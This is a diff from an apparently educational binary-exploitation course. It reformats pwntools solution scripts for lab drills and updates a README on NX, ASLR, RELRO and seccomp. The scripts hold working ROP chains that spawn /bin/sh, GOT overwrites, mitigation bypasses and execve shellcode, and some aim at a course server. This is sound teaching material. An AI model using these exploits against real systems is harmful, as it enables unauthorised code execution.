@@ -31,11 +31,17 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * b"A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address) + pack(system_plt_address) +payload = ( + offset * b"A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address) + + pack(system_plt_address) +) log.info("payload: " + "".join("\\x{:02x}".format(i) for i in payload)) io = process(binary) -#gdb.attach(io) +# gdb.attach(io) io.sendline("Ana") io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/README.md b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/README.md index 577d324..689746d 100644 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/README.md +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/README.md @@ -1,5 +1,5 @@ Assume ASLR disabled. 
To disable ASLR (it's enabled by default on Linux) use: -``` +```console setarch x86_64 -R /bin/bash ``` diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/sol/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/sol/exploit3.py index 35a5ec6..0a5c72c 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/sol/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/sol/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) main_address = e.symbols[b"main"] @@ -28,7 +28,7 @@ # offset is rbp+0x8-(rbp-0x20) = 0x28 offset = 0x38 -puts_address_in_libc = 0x7ffff7a64a30 +puts_address_in_libc = 0x7FFFF7A64A30 log.info("puts_address_in_libc: 0x{:016x}".format(puts_address_in_libc)) libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") @@ -47,11 +47,19 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * b"A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address_in_libc) + pack(system_address_in_libc) -log.info("2nd stage 2nd stage payload: " + "".join("\\x{:02x}".format(i) for i in payload)) +payload = ( + offset * b"A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address_in_libc) + + pack(system_address_in_libc) +) +log.info( + "2nd stage 2nd stage payload: " + "".join("\\x{:02x}".format(i) for i in payload) +) io = process(binary) -#gdb.attach(io) +# gdb.attach(io) io.sendline("Ana") io.sendline(payload) diff --git 
a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/09-challenge-bypass-dep-aslr-libc/sol/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/09-challenge-bypass-dep-aslr-libc/sol/exploit3.py index 11f62f2..8165fda 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/09-challenge-bypass-dep-aslr-libc/sol/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/09-challenge-bypass-dep-aslr-libc/sol/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) main_address = e.symbols[b"main"] @@ -32,7 +32,13 @@ # 1st stage payload -payload = offset * b"A" + pack(pop_rdi_ret) + pack(puts_got_address) + pack(puts_plt_address) + pack(main_address) +payload = ( + offset * b"A" + + pack(pop_rdi_ret) + + pack(puts_got_address) + + pack(puts_plt_address) + + pack(main_address) +) log.info("1st stage payload: " + "".join("\\x{:02x}".format(i) for i in payload)) io.sendline("Ana") @@ -41,7 +47,7 @@ io.sendline(payload) msg = io.recvline() msg = msg.strip()[16:] -msg = msg + (8-len(msg)) * b"\x00" +msg = msg + (8 - len(msg)) * b"\x00" puts_address_in_libc = unpack(msg) log.info("puts_address_in_libc: 0x{:016x}".format(puts_address_in_libc)) @@ -63,10 +69,18 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * b"A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address_in_libc) + pack(system_address_in_libc) -log.info("2nd stage 2nd stage payload: " + "".join("\\x{:02x}".format(i) for i in payload)) - -#gdb.attach(io) +payload = ( + offset * b"A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address_in_libc) + + pack(system_address_in_libc) +) +log.info( + "2nd stage 2nd stage payload: " + 
"".join("\\x{:02x}".format(i) for i in payload) +) + +# gdb.attach(io) io.sendline("Ana") io.recvline() io.recvline() diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py index e87a150..40d3c52 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py @@ -7,38 +7,41 @@ SOLUTION = 1 if local: - p = process('../src/rwslotmachine1') + p = process("../src/rwslotmachine1") else: - p = remote('141.85.224.117', 31344) + p = remote("141.85.224.117", 31344) + def do_read(idx): - p.recvuntil('>') - p.sendline('1') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil(']: ') - return int(p.recvuntil('\n')[:-1], 16) + p.recvuntil(">") + p.sendline("1") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("]: ") + return int(p.recvuntil("\n")[:-1], 16) + def do_write(idx, value): - p.recvuntil('>') - p.sendline('2') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil('value:') - p.sendline(hex(value)) + p.recvuntil(">") + p.sendline("2") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("value:") + p.sendline(hex(value)) + if SOLUTION == 1: - stack_leak = do_read(1) - stack_slots = stack_leak - 0x3e + stack_leak = do_read(1) + stack_slots = stack_leak - 0x3E else: - stack_leak = do_read(-7) - stack_slots = stack_leak + stack_leak = do_read(-7) + stack_slots = stack_leak shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" shellcode_pieces = unpack_many(shellcode, 32) for i in range(len(shellcode_pieces)): - do_write(i, shellcode_pieces[i]) + do_write(i, shellcode_pieces[i]) do_write(-8, stack_slots) diff --git 
a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py index 1021472..7c0719e 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py @@ -3,33 +3,36 @@ local = True if local: - p = process('../src/rwslotmachine2') - binary = p.elf + p = process("../src/rwslotmachine2") + binary = p.elf else: - p = remote('141.85.224.117', 31345) - binary = ELF('../src/rwslotmachine2') + p = remote("141.85.224.117", 31345) + binary = ELF("../src/rwslotmachine2") libc = ELF("../src/libc.so.6") + def do_read(idx): - p.recvuntil('>') - p.sendline('1') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil(']: ') - return int(p.recvuntil('\n')[:-1], 16) + p.recvuntil(">") + p.sendline("1") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("]: ") + return int(p.recvuntil("\n")[:-1], 16) + def do_write(idx, value): - p.recvuntil('>') - p.sendline('2') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil('value:') - p.sendline(hex(value)) + p.recvuntil(">") + p.sendline("2") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("value:") + p.sendline(hex(value)) + -slots_offset = binary.symbols['slots'] -strtoll_got_offset = binary.got['strtoll'] -puts_got_offset = binary.got['puts'] +slots_offset = binary.symbols["slots"] +strtoll_got_offset = binary.got["strtoll"] +puts_got_offset = binary.got["puts"] index_to_puts = (puts_got_offset - slots_offset) / 4 index_to_strtoll = (strtoll_got_offset - slots_offset) / 4 @@ -40,6 +43,6 @@ def do_write(idx, value): do_write(index_to_strtoll, system) -p.sendline('/bin/sh') +p.sendline("/bin/sh") p.interactive() diff --git 
a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/03-rwslotmachine3/sol/sol_got_overwrite_2stage.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/03-rwslotmachine3/sol/sol_got_overwrite_2stage.py index a4a7d51..1ebdba4 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/03-rwslotmachine3/sol/sol_got_overwrite_2stage.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/03-rwslotmachine3/sol/sol_got_overwrite_2stage.py @@ -3,32 +3,35 @@ local = False if local: - p = remote('127.0.0.1', 31346) + p = remote("127.0.0.1", 31346) else: - p = remote('141.85.224.117', 31346) + p = remote("141.85.224.117", 31346) libc = ELF("../src/libc.so.6") -binary = ELF('../src/rwslotmachine3') +binary = ELF("../src/rwslotmachine3") + def do_read(idx): - p.recvuntil('>') - p.sendline('1') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil(']: ') - return int(p.recvuntil('\n')[:-1], 16) + p.recvuntil(">") + p.sendline("1") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("]: ") + return int(p.recvuntil("\n")[:-1], 16) + def do_write(idx, value): - p.recvuntil('>') - p.sendline('2') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil('value:') - p.sendline(hex(value)) + p.recvuntil(">") + p.sendline("2") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("value:") + p.sendline(hex(value)) + -slots_offset = binary.symbols['slots'] -strtoll_got_offset = binary.got['strtoll'] -puts_got_offset = binary.got['puts'] +slots_offset = binary.symbols["slots"] +strtoll_got_offset = binary.got["strtoll"] +puts_got_offset = binary.got["puts"] index_to_puts = (puts_got_offset - slots_offset) / 4 index_to_strtoll = (strtoll_got_offset - slots_offset) / 4 @@ -37,16 +40,16 @@ def do_write(idx, value): libc_base = libc_leak - libc.symbols["puts"] system = libc_base + libc.symbols["system"] -p.sendline('3') +p.sendline("3") p.close() if 
local: - p = remote('127.0.0.1', 1234) + p = remote("127.0.0.1", 1234) else: - p = remote('141.85.224.117', 31346) + p = remote("141.85.224.117", 31346) do_write(index_to_strtoll, system) -p.sendline('/bin/sh') +p.sendline("/bin/sh") p.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/04-rwslotmachine4/sol/sol_relro_bypass.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/04-rwslotmachine4/sol/sol_relro_bypass.py index e2259bc..ee74820 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/04-rwslotmachine4/sol/sol_relro_bypass.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/04-rwslotmachine4/sol/sol_relro_bypass.py @@ -6,31 +6,34 @@ local = False if local: - p = process('../src/rwslotmachine4', env={'LD_LIBRARY_PATH' : '.'}) - binary = p.elf + p = process("../src/rwslotmachine4", env={"LD_LIBRARY_PATH": "."}) + binary = p.elf else: - p = remote('141.85.224.117', 31347) - binary = ELF('../src/rwslotmachine4') + p = remote("141.85.224.117", 31347) + binary = ELF("../src/rwslotmachine4") + def do_read(idx): - p.recvuntil('>') - p.sendline('1') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil(']: ') - return int(p.recvuntil('\n')[:-1], 16) + p.recvuntil(">") + p.sendline("1") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("]: ") + return int(p.recvuntil("\n")[:-1], 16) + def do_write(idx, value): - p.recvuntil('>') - p.sendline('2') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil('value:') - p.sendline(hex(value)) + p.recvuntil(">") + p.sendline("2") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("value:") + p.sendline(hex(value)) + -slots_offset = binary.symbols['slots'] -puts_got_offset = binary.got['puts'] -readint_got_offset = binary.got['read_int'] +slots_offset = binary.symbols["slots"] +puts_got_offset = binary.got["puts"] +readint_got_offset = 
binary.got["read_int"] index_to_puts = (puts_got_offset - slots_offset) / 4 index_to_readint = (readint_got_offset - slots_offset) / 4 @@ -45,10 +48,10 @@ def do_write(idx, value): libint_base = libint_leak - libint.symbols["read_int"] # overwrite strtoll in the GOT of libint -libint_strtoll_got_offset = libint.got['strtoll'] +libint_strtoll_got_offset = libint.got["strtoll"] index_to_libint_strtoll = (libint_base + libint_strtoll_got_offset - slots_offset) / 4 do_write(index_to_libint_strtoll, system) -p.sendline('/bin/sh') +p.sendline("/bin/sh") p.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/05-rwslotmachine5/sol/sol_seccomp.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/05-rwslotmachine5/sol/sol_seccomp.py index e50b60c..40f2e69 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/05-rwslotmachine5/sol/sol_seccomp.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/05-rwslotmachine5/sol/sol_seccomp.py @@ -3,30 +3,34 @@ local = False if local: - p = process('../src/rwslotmachine5') + p = process("../src/rwslotmachine5") else: - p = remote('141.85.224.117', 31348) + p = remote("141.85.224.117", 31348) + def do_read(idx): - p.recvuntil('>') - p.sendline('1') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil(']: ') - return int(p.recvuntil('\n')[:-1], 16) + p.recvuntil(">") + p.sendline("1") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("]: ") + return int(p.recvuntil("\n")[:-1], 16) + def do_write(idx, value): - p.recvuntil('>') - p.sendline('2') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil('value:') - p.sendline(hex(value)) + p.recvuntil(">") + p.sendline("2") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("value:") + p.sendline(hex(value)) + stack_leak = do_read(1) -stack_slots = stack_leak - 0x3e +stack_slots = stack_leak - 0x3E -shellcode = asm(''' 
+shellcode = asm( + """ xor ecx, ecx xor eax, eax push 0x6761 @@ -49,12 +53,13 @@ def do_write(idx, value): int 0x80 mov al, 252 int 0x80 -''') +""" +) shellcode_pieces = unpack_many(shellcode, 32) for i in range(len(shellcode_pieces)): - do_write(i, shellcode_pieces[i]) + do_write(i, shellcode_pieces[i]) do_write(-8, stack_slots) diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/common/skel.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/common/skel.py index 4a3dad5..47eb7d4 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/common/skel.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/common/skel.py @@ -1,23 +1,26 @@ from pwn import * # TODO update binary name with task number -p = process('./rwslotmachineX') +p = process("./rwslotmachineX") + def do_read(idx): - p.recvuntil('>') - p.sendline('1') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil(']: ') - return int(p.recvuntil('\n')[:-1], 16) + p.recvuntil(">") + p.sendline("1") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("]: ") + return int(p.recvuntil("\n")[:-1], 16) + def do_write(idx, value): - p.recvuntil('>') - p.sendline('2') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil('value:') - p.sendline(hex(value)) + p.recvuntil(">") + p.sendline("2") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("value:") + p.sendline(hex(value)) + gdb.attach(p) diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/reading/README.md b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/reading/README.md index 70babf6..12ff211 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/reading/README.md +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/reading/README.md @@ -1,27 +1,28 @@ ---- -linkTitle: Defense Mechanisms -type: docs -weight: 10 ---- - # 
Defense Mechanisms ## Introduction -The previous sessions ([Shellcodes](../shellcodes/) and [Shellcodes Advanced](../shellcodes-advanced/)) presented an exploitation scenario that is based on the assumption that machine instructions can be executed from **any** memory segment belonging to the process. As you can recall from the [Executable File Formats](../executable-file-formats/) session, different sections of an ELF binary are grouped into segments which are loaded into memory when the binary is being executed. This mechanism (and some hardware support) enables 2 important protection mechanisms that will be presented in this session: +The previous sessions ([Shellcodes](../../../exploitation-techniques/shellcodes/reading) and [Shellcodes Advanced](../../../exploitation-techniques/shellcodes-advanced/reading)) presented an exploitation scenario that is based on the assumption that machine instructions can be executed from **any** memory segment belonging to the process. +As you can recall from the [Executable File Formats](../../../binary-analysis/executables-and-processes/reading) session, different sections of an ELF binary are grouped into segments which are loaded into memory when the binary is being executed. +This mechanism (and some hardware support) enables 2 important protection mechanisms that will be presented in this session: -* Executable Space Protection: only certain parts of the address space exhibit the code execution right; -* Address Space Layout Randomization (ASLR): certain parts of the address space get mapped at random locations. +- Executable Space Protection: only certain parts of the address space exhibit the code execution right; +- Address Space Layout Randomization (ASLR): certain parts of the address space get mapped at random locations. 
-In the [Return Oriented Programming](../return-oriented-prgramming) session we discussed how the **PLT**/**GOT** work in relation to resolving addresses of functions from dynamically liked libraries. We also learned how to abuse this process and trigger arbitrary code execution by **corrupting GOT entries**. We will take this exploit primitive to the next level and explore how it can be used when additional defense mechanisms are in use. +In the [Return Oriented Programming](../../../exploitation-techniques/return-oriented-programming/reading) session we discussed how the **PLT**/**GOT** work in relation to resolving addresses of functions from dynamically linked libraries. +We also learned how to abuse this process and trigger arbitrary code execution by **corrupting GOT entries**. +We will take this exploit primitive to the next level and explore how it can be used when additional defense mechanisms are in use. Next, we will introduce the **RELRO** mitigation, which is designed to preclude the overwriting of relocation sections such as the GOT. Another defense mechanism we will discuss is **seccomp**, which enables applications to enforce restrictions on the system calls performed in the process and child processes, thereby creating a sandbox. -Besides presenting these mechanisms, we are also going to take a quick look at how can we bypass them. Since these protections are ubiquitous at this time, you will have to work around them almost every time you build a binary exploit. +Besides presenting these mechanisms, we are also going to take a quick look at how we can bypass them. +Since these protections are ubiquitous at this time, you will have to work around them almost every time you build a binary exploit. -**IMPORTANT:** The tasks today are designed for 32 bit executables. Make sure you compile with the `-m32` flag for `gcc`. The binaries in the tasks archive are already compiled as such. +**Important:** The tasks today are designed for 32-bit executables.
+Make sure you compile with the `-m32` flag for `gcc`. +The binaries in the tasks archive are already compiled as such. ## Tutorials @@ -31,11 +32,15 @@ The tutorials will showcase the tools used to inspect the defense mechanisms. The `checksec` command-line tool is a wrapper over the functionality implemented in pwntools' `pwnlib.elf.elf` module. -To get it to work in the Kali VM, you have to update pwntools to the latest version using `pip3 install -U pwntools`. +To get it to work in the Kali VM, you have to update pwntools to the latest version using: + +```console +pip3 install -U pwntools +``` We will use this tool throughout the session to identify which defense mechanisms are enabled for a certain binary: -``` +```console root@kali:~/demo/nx# checksec ./no_nx [*] '/root/demo/nx/no_nx' Arch: i386-32-little @@ -48,40 +53,64 @@ root@kali:~/demo/nx# checksec ./no_nx ### Executable Space Protection -The `executable space protection` is an instance of the `principle of least privilege`, which is applied in many security sensitive domains. In this case, the executable space protection is used to limit the types of memory access that a process is allowed to make during execution. A memory region (i.e. page) can have the following protection levels: **READ**, **WRITE** and **EXECUTE**. The executable space protection mechanism mandates that writable regions should not be executable at the same time. This prevents code injection. +The `executable space protection` is an instance of the `principle of least privilege`, which is applied in many security sensitive domains. +In this case, the executable space protection is used to limit the types of memory access that a process is allowed to make during execution. +A memory region (i.e. page) can have the following protection levels: **READ**, **WRITE** and **EXECUTE**. +The executable space protection mechanism mandates that writable regions should not be executable at the same time. +This prevents code injection. 
The mechanism can be (and was) implemented in many different ways, the most common in Linux being: -* **NX bit**: This is the easiest method, and involves an extra bit added to each page table entry that specifies if the memory page should be executable or not. This is the current implementation in 64-bit processors where page table entries are 8-bytes wide. -* **Physical Address Extension (PAE)**: Besides the main feature that allows access to more than 4GB of memory, the PAE extension for 32-bit processor also adds a NX bit in its page table entries. -* **Emulation**: The NX bit can be emulated on older (i.e., non-PAE) 32-bit processors by overloading the Supervisor bit ([PaX PAGEEXEC](https://en.wikipedia.org/wiki/PaX#PAGEEXEC)), or by using the segmentation mechanism and splitting the address space in half ([PaX SEGMEXEC](https://en.wikipedia.org/wiki/PaX#SEGMEXEC)). +- **`NX` bit**: This is the easiest method, and involves an extra bit added to each page table entry that specifies if the memory page should be executable or not. +This is the current implementation in 64-bit processors where page table entries are 8-bytes wide. +- **Physical Address Extension (`PAE`)**: Besides the main feature that allows access to more than 4GB of memory, the PAE extension for 32-bit processor also adds a NX bit in its page table entries. +- **Emulation**: The NX bit can be emulated on older (i.e., non-PAE) 32-bit processors by overloading the Supervisor bit ([`PaX PAGEEXEC`](https://en.wikipedia.org/wiki/PaX#PAGEEXEC)), or by using the segmentation mechanism and splitting the address space in half ([PaX SEGMEXEC](https://en.wikipedia.org/wiki/PaX#SEGMEXEC)). -This security feature gets in the way of **just-in-time (JIT)** compilers, which need to produce and write code at runtime, and that is later executed. Since a JIT compiler cannot run in this kind of secured environment, an application using it is vulnerable to attacks known as **JIT spraying**. 
The idea was first presented by Dion Blazakis, and is, briefly, a way to force the JIT compiler to produce shellcode. +This security feature gets in the way of **just-in-time (`JIT`)** compilers, which need to produce and write code at runtime, and that is later executed. +Since a JIT compiler cannot run in this kind of secured environment, an application using it is vulnerable to attacks known as **JIT spraying**. +The idea was first presented by Dion Blazakis, and is, briefly, a way to force the JIT compiler to produce shellcode. -* Slides: [Black Hat & DEF CON 2010](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf); -* Paper: [Interpreter Exploitation. Pointer Inference and JIT Spraying](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf). +- Slides: [Black Hat & DEF CON 2010](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf); +- Paper: [Interpreter Exploitation. Pointer Inference and JIT Spraying](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf). -There are of course other implementations in different hardening-oriented projects such as: OpenBSD [W^X](https://marc.info/?l=openbsd-misc&m=105056000801065), Red Hat [Exec Shield](https://marc.info/?l=openbsd-misc&m=105056000801065), PaX (which is now part of [grsecurity](https://grsecurity.net/)), Windows Data Execution Prevention ([DEP](https://docs.microsoft.com/en-us/windows/win32/memory/data-execution-prevention)). +There are of course other implementations in different hardening-oriented projects such as: OpenBSD [`W^X`](https://isopenbsdsecu.re/mitigations/wx/), Red Hat [`Exec Shield`](https://www.redhat.com/en/blog/security-technologies-execshield), `PaX` (which is now part of [`grsecurity`](https://grsecurity.net/)), Windows Data Execution Prevention ([`DEP`](https://docs.microsoft.com/en-us/windows/win32/memory/data-execution-prevention)). 
### Memory Segments Permissions Walkthrough -The Linux kernel provides support for managing memory protections using the `mmap()` and `mprotect()` syscalls. Simply put, what they do is: +The Linux kernel provides support for managing memory protections using the `mmap()` and `mprotect()` syscalls. +Simply put, what they do is: -* `mmap()`: requests the OS to create a mapping (allocate space) inside the address space of the calling process. See [this answer](https://stackoverflow.com/questions/3642021/what-does-mmap-do); -* `mprotect()`: requests the OS to set permissions over a memory region (e.g. `PROT_READ`, `PROT_WRITE`, `PROT_EXEC` and others). +- `mmap()`: requests the OS to create a mapping (allocate space) inside the address space of the calling process. + See [this answer](https://stackoverflow.com/questions/3642021/what-does-mmap-do); +- `mprotect()`: requests the OS to set permissions over a memory region (e.g. `PROT_READ`, `PROT_WRITE`, `PROT_EXEC` and others). -These syscalls are used by the loader to set protection levels for each segment it loads when running a binary. Of course, the same functions can also be used during execution. +These syscalls are used by the loader to set protection levels for each segment it loads when running a binary. +Of course, the same functions can also be used during execution. -PaX has a protection option that restricts the use of `mprotect()` and `mmap()` to avoid resetting the permissions during execution. See [MPROTECT](https://pax.grsecurity.net/docs/mprotect.txt). Note that grsecurity/PaX are patches to the kernel, and are not available in normal distributions. You have to compile your own kernel if you want to try them out. +PaX has a protection option that restricts the use of `mprotect()` and `mmap()` to avoid resetting the permissions during execution. +See [MPROTECT](https://pax.grsecurity.net/docs/mprotect.txt). 
+Note that grsecurity/PaX are patches to the kernel, and are not available in normal distributions. +You have to compile your own kernel if you want to try them out. -Let's start by deactivating ASLR, which is going to be discussed in the following section of this tutorial, and only focus on the NX protection. We can do this in two ways, as told below. +Let's start by deactivating ASLR, which is going to be discussed in the following section of this tutorial, and only focus on the NX protection. +We can do this in two ways, as told below. -* To disable ASLR system-wide we use (root access is required): `sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'`; -* To create a shell with ASLR disabled (ASLR will also be disabled for future processes spawned from that shell), we use (root access is not required): `setarch $(uname -m) -R /bin/bash`. +- To disable ASLR system-wide we use (root access is required): -After disabling ASLR, let's compile an extremely simple C application. Save the following code as `hello.c`: + ```console + sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space' + ``` -``` +- To create a shell with ASLR disabled (ASLR will also be disabled for future processes spawned from that shell), we use (root access is not required): + + ```console + setarch $(uname -m) -R /bin/bash + ``` + +After disabling ASLR, let's compile an extremely simple C application. +Save the following code as `hello.c`: + +```c int main() { while (1); } @@ -89,11 +118,19 @@ int main() { Make sure you have both `build-essential` and `gcc-multilib` packages installed before going further (run `sudo apt install build-essential gcc-multilib` on Debian-based systems). -Compile the `hello.c` code using `CFLAGS='-m32 -O0' make hello`. The result should be a `hello` binary. - -As presented in the `Static Analysis` session, the ELF format contains flags for each segment that specify what permissions should be granted. 
You can use `readelf -l hello` to dump all program headers for this binary. The result should be similar to: +Compile the `hello.c` code using: +```console +CFLAGS='-m32 -O0' make hello ``` + +The result should be a `hello` binary. + +As presented in the ["Static Analysis" session](../../../binary-analysis/static-analysis/reading), the ELF format contains flags for each segment that specify what permissions should be granted. +You can use `readelf -l hello` to dump all program headers for this binary. +The result should be similar to: + +```text Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align PHDR 0x000034 0x08048034 0x08048034 0x00120 0x00120 R E 0x4 @@ -109,28 +146,31 @@ Program Headers: Section to Segment mapping: Segment Sections... - 00 - 01 .interp - 02 .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame - 03 .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss - 04 .dynamic - 05 .note.ABI-tag .note.gnu.build-id - 06 .eh_frame_hdr - 07 + 00 + 01 .interp + 02 .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame + 03 .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss + 04 .dynamic + 05 .note.ABI-tag .note.gnu.build-id + 06 .eh_frame_hdr + 07 08 .init_array .fini_array .jcr .dynamic .got ``` -Check the `Flg` column. For example, the first `LOAD` segment contains `.text` and is marked `R E`, while the `GNU_STACK` segment is marked `RW `. +Check the `Flg` column. +For example, the first `LOAD` segment contains `.text` and is marked `R E`, while the `GNU_STACK` segment is marked `RW`. -Next we are interested in seeing calls to `mmap2()` and `mprotect()` made by the loader. We are going to use the `strace` tool for this, and directly execute the loader. 
You can check the path to the loader on your system using `ldd hello`. +Next we are interested in seeing calls to `mmap2()` and `mprotect()` made by the loader. +We are going to use the `strace` tool for this, and directly execute the loader. +You can check the path to the loader on your system using `ldd hello`. -``` -$ strace -e mmap2,mprotect /lib/ld-linux.so.2 ./hello +```console +strace -e mmap2,mprotect /lib/ld-linux.so.2 ./hello ``` The output should be similar to: -``` +```text [ Process PID=11198 runs in 32 bit mode. ] mmap2(0x8048000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0) = 0x8048000 mmap2(0x8049000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0) = 0x8049000 @@ -146,15 +186,20 @@ mprotect(0x8049000, 4096, PROT_READ) = 0 mprotect(0x56575000, 4096, PROT_READ) = 0 ``` -We can observe a `PROT_READ|PROT_EXEC` mapping at address `0x8048000`, followed by a `PROT_READ|PROT_WRITE` at address `0x8049000` that is later changed to `PROT_READ` for the first half (4096 bytes). The later allocation is the data segment, that should be writable. We can also see a bunch of allocations for segments belonging to dynamic libraries. +We can observe a `PROT_READ|PROT_EXEC` mapping at address `0x8048000`, followed by a `PROT_READ|PROT_WRITE` at address `0x8049000` that is later changed to 